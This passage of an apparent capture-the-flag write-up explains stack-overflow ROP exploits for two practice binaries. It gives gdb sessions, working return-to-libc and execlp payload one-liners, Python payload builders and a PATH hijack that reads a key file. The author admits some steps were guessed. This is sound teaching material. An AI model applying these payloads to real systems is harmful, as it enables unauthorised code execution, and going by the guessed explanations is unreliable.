We need 2 more things: a fake return address and an argument to pass to system ("/bin/sh").
The fake return address can be anything, so I chose "\x00"*4 (remember an address is 4 bytes).
To get the "/bin/sh" string to pass in, we're going to have to find it inside of libc (unlike ROP 2, where it was given to you). This is done using gdb find, like so:

 (gdb) break main  
 (gdb) run  
 (gdb) print &system  
 $1 = (<text variable, no debug info> *) 0xf7e68250 <system>  
 (gdb) find &system,+9999999,"/bin/sh"  
 0xf7f86c4c  
 warning: Unable to access target memory at 0xf7fd0fd4, halting search.  
 1 pattern found.  

Now we have the string "/bin/sh" at 0xf7f86c4c. Let's finish constructing our exploit string:
                         (overflow)  (<system>)      (fake return address) ("/bin/sh" from libc)  
 cat <(python -c 'print "\x00"*140+"\x50\x82\xe6\xf7"+    "\x00"*4        +"\x4c\x6c\xf8\xf7"') - | ./rop3  
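
The layout of that string can be sketched in Python 3 as a small builder: padding, the address of system, a fake return address, then the argument. The addresses are the ones gdb printed above and will differ on other machines; `p32` and `ret2libc_chain` are hypothetical helper names.

```python
import struct


def p32(value):
    """Pack a 32 bit value as little-endian bytes."""
    return struct.pack("<I", value)


def ret2libc_chain(padding_len, system_addr, arg_addr, fake_return=0):
    """Overflow padding, then system(), its fake return address, and its argument."""
    return (b"\x00" * padding_len
            + p32(system_addr)
            + p32(fake_return)
            + p32(arg_addr))


chain = ret2libc_chain(140, 0xf7e68250, 0xf7f86c4c)
print(len(chain))
```

The fake return address sits between system and its argument because system expects the stack to look as if it had been reached by a normal call.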

Done!
 id  
 uid=1796(user1792) gid=3009(rop3) groups=1797(user1792),1002(webshell)  

Now for ROP 4 (by writing this, I was able to then go back and solve it).
Here is my solution:
                        (overflow) (<execlp>)     (fake return) ("/bin/sh")(twice) ($EXPLOIT env variable)    (null)
 cat <(python -c 'print "A"*140+"\xb0\x3a\x05\x08"+   "A"*4  +"\x4f\xbf\x0c\x08"*2+"\x50\xd8\xff\xff"+"\xa1\x97\x0c\x08"') - | ./rop4  

And the problem source:
 #include <stdio.h>  
 #include <unistd.h>  
 #include <string.h>  
 char exec_string[20];  
 void exec_the_string() {  
      execlp(exec_string, exec_string, NULL);  
 }  
 void call_me_with_cafebabe(int cafebabe) {  
      if (cafebabe == 0xcafebabe) {  
           strcpy(exec_string, "/sh");  
      }  
 }  
 void call_me_with_two_args(int deadbeef, int cafebabe) {  
      if (cafebabe == 0xcafebabe && deadbeef == 0xdeadbeef) {  
           strcpy(exec_string, "/bin");  
      }  
 }  
 void vulnerable_function() {  
      char buf[128];  
      read(STDIN_FILENO, buf, 512);  
 }  
 int main(int argc, char** argv) {  
      exec_string[0] = '\0';  
 
      vulnerable_function();  
 }  


So, this is probably not how you were supposed to solve it (based on the source code), but it works. With ROP 4, we're not given <system>, but we are given <execlp>. execlp takes 3 parameters:
char *file, char *arg, NULL
Our goal then is to run this (not really though, as you will learn later):
 execlp("/bin/sh","/bin/sh",NULL);  

Let's get the addresses of <execlp>, "/bin/sh", and NULL using gdb:
 (gdb) break main  
 (gdb) run  
 (gdb) print execlp  
 $1 = {<text variable, no debug info>} 0x8053ab0 <execlp>  
 (gdb) find &execlp,+999999999,"/bin/sh"  
 0x80cbf4f  
 (gdb) print &null  
 $3 = (<data variable, no debug info> *) 0x80c97a1  
 (gdb) x/s 0x80c97a1  
 0x80c97a1 <null>:      "(null)"  

Alright, let's try it:
                      (overflow)    (execlp)     (fake return) ("/bin/sh")(three times)    (null)
 cat <(python -c 'print "A"*140+"\xb0\x3a\x05\x08"+   "A"*4+   "\x4f\xbf\x0c\x08"*3+   "\xa1\x97\x0c\x08"') - | ./rop4  
*note, I don't know why I needed /bin/sh 3 times, but it works so just roll with it.

However, when we do that, we get:
 /bin/sh: /bin/sh: cannot execute binary file  

Now, here is where I will admit that I don't actually know C (i.e. how you're supposed to call execlp). What I do know is that it's calling sh with the parameter sh, which you can't do (sh sh: error). So instead of trying to fix that, I decided to change the argument passed to sh to be my own program (in my home directory). It looks like this:
 # rop4s.sh  
 cat /problems/ROP_4_887f7f28b1f64d7e/key  

Now, we need to be able to pass in the location of that file ("/home2/user1792/rop4s.sh") to our execlp function. Here is where we need to use an environment variable. Let's assign our string to EXPLOIT and then use our program from buffer overflows to find its address (compile with '-m32' to get a 32-bit address like the ones in rop4 - gcc -m32 -o printer printer.c):
 export EXPLOIT="/home2/user1792/rop4s.sh" 
 /* printer.c */  
 #include <stdio.h>   
 #include <stdlib.h>   
 int main(int argc, char **argv) {   
  printf("\n%p\n\n", getenv("EXPLOIT"));   
  return(0);   
 }   

Running that, we get 0xffffd830 as our address. Alright, let's use that instead of our 3rd "/bin/sh":
                       (overflow)    (execlp)      (fake return) ("/bin/sh")(two times) (EXPLOIT address)     (null)
 cat <(python -c 'print "A"*140+"\xb0\x3a\x05\x08"+    "A"*4+   "\x4f\xbf\x0c\x08"*2+  "\x30\xd8\xff\xff"+"\xa1\x97\x0c\x08"') - | ./rop4  
 /bin/sh: �z X�K ����i686: No such file or directory  

Well, that didn't work. Let's increase the address of our environment variable by an arbitrary 32 (0x20).
                        (overflow) (<execlp>)     (fake return) ("/bin/sh")(twice) ($EXPLOIT env variable)    (null)
 cat <(python -c 'print "A"*140+"\xb0\x3a\x05\x08"+   "A"*4  +"\x4f\xbf\x0c\x08"*2+"\x50\xd8\xff\xff"+"\xa1\x97\x0c\x08"') - | ./rop4  

Success! Wait... what just happened? Yeah, I have no idea. Good luck!
(I got the 0x20 increase by first bumping the address by an arbitrary amount, something like 0x18, and finding my environment variable stuck in the output. Then I just increased the address until it cut off the "EXPLOIT=" bit before the path.)
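
That trial and error can be written down as a small loop. Again, just a sketch in Python 3 under this post's assumptions: 0xffffd830 is what printer reported, the real string sits a little higher, and the step and range are arbitrary picks of mine. candidate_payloads is a made-up helper name.

```python
import struct

def p32(addr):
    """Pack a 32-bit address as 4 little-endian bytes (x86 byte order)."""
    return struct.pack("<I", addr)

# Addresses from the gdb session and from printer (specific to this setup).
EXECLP = 0x08053AB0
BIN_SH = 0x080CBF4F
NULL_SYM = 0x080C97A1
GUESS = 0xFFFFD830     # address of $EXPLOIT as reported by printer

def candidate_payloads(guess, max_offset=0x40, step=4):
    """Hypothetical helper: yield (offset, payload) pairs for addresses near the guess."""
    for offset in range(0, max_offset + 1, step):
        payload = b"A" * 140           # filler up to the saved return address
        payload += p32(EXECLP)         # jump into execlp
        payload += b"A" * 4            # fake return address
        payload += p32(BIN_SH) * 2     # "/bin/sh" twice, as in the exploit above
        payload += p32(guess + offset) # shifted guess for the script path
        payload += p32(NULL_SYM)       # the "(null)" symbol used as the last argument
        yield offset, payload

candidates = dict(candidate_payloads(GUESS))
```

Each candidate would be piped into ./rop4 in turn. The one whose third argument lands exactly on the start of the path (offset 0x20 in my case) is the one that prints the key.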

Normally ASLR is turned on, which randomizes addresses (like that of our environment variable) so that they're hard to find. In this case ASLR was not turned on, but the stack got modified slightly anyway. The environment strings sit near the top of the stack, next to things like the program name, so running rop4 instead of printer most likely moved stuff around (i.e. the real address of our environment variable) in a way we cannot always predict. That being said, we can still guess (as long as ASLR is off), and it turns out that we weren't that far off (0x20). Bypassing ASLR is outside the scope of this post (and my knowledge), but it's nice to clear up that bit.

Update:
Finding the environment variable with a mangled stack can be tough, so I figured out a more robust solution. Instead of using an environment variable, let's just make a new command and use strings from libc to call it. This is what I mean:

1. Remember rop4s.sh? Make a copy of it and name it "ch".
2. Now edit your PATH and add the directory of your "ch" shell script file.
3. Now you can call "ch" from the command line, and it should run your script.
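
The reason this works is that a bare name like "ch" gets looked up in the directories listed in PATH, first match wins. Here is a small sketch of that lookup in Python 3, using shutil.which on a throwaway directory. The script contents and the helper name resolve_with_path are stand-ins I made up, not the real rop4s.sh.

```python
import os
import shutil
import tempfile

def resolve_with_path(name, extra_dir, base_path):
    """Hypothetical helper: which file a PATH search picks once extra_dir is prepended."""
    search_path = extra_dir + os.pathsep + base_path
    return shutil.which(name, path=search_path)

with tempfile.TemporaryDirectory() as cmd_dir:
    # Stand-in for "cp rop4s.sh cmd/ch": an executable file named "ch".
    script = os.path.join(cmd_dir, "ch")
    with open(script, "w") as f:
        f.write("#!/bin/sh\necho hello from ch\n")
    os.chmod(script, 0o755)

    # Stand-in for "export PATH=<cmd dir>:$PATH", without touching the real PATH.
    found = resolve_with_path("ch", cmd_dir, os.environ.get("PATH", ""))
    print("resolved:", found)
```

Putting the new directory at the front of PATH matters: if some other "ch" already existed further down the list, ours would still be found first.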

Now let's see how the code looks:
 # first we need a string from libc that isn't already a command (I chose "ch")  
 gdb rop4  
 (gdb) break main  
 (gdb) run  
 (gdb) print execlp  
 >> $1 = {<text variable, no debug info>} 0x8053ab0 <execlp>  
 (gdb) find &execlp,+9999999,"ch"  
 >> 0x80ccf48 <__PRETTY_FUNCTION__.8742+9>  
 >> 0x80dafa1 # we'll use this address  
 # now we isolate rop4s.sh and rename it to "ch"  
 mkdir cmd  
 cp rop4s.sh cmd/ch  
 # and then add it to our path  
 export PATH=/home2/user1792/cmd:$PATH  
 # and our new exploit becomes:  
                         (fill)  (execlp)          (retn) ("/bin/sh")(twice)      ("ch")              (null)
 cat <(python -c 'print "A"*140+"\xb0\x3a\x05\x08"+"A"*4+"\x4f\xbf\x0c\x08"*2+ "\xa1\xaf\x0d\x08"+"\xa1\x97\x0c\x08"') - | ./rop4  


For more info on ROP (and bypassing ASLR), check out these sources:
https://isisblogs.poly.edu/2011/10/21/geras-insecure-programming-warming-up-stack-1-rop-nxaslr-bypass/
http://blog.the-playground.dk/2012/08/lesson-learned-from-my-first-rop-exploit.html
http://security.stackexchange.com/questions/20497/stack-overflows-defeating-canaries-aslr-dep-nx
http://security.dico.unimi.it/~gianz/pubs/acsac09.pdf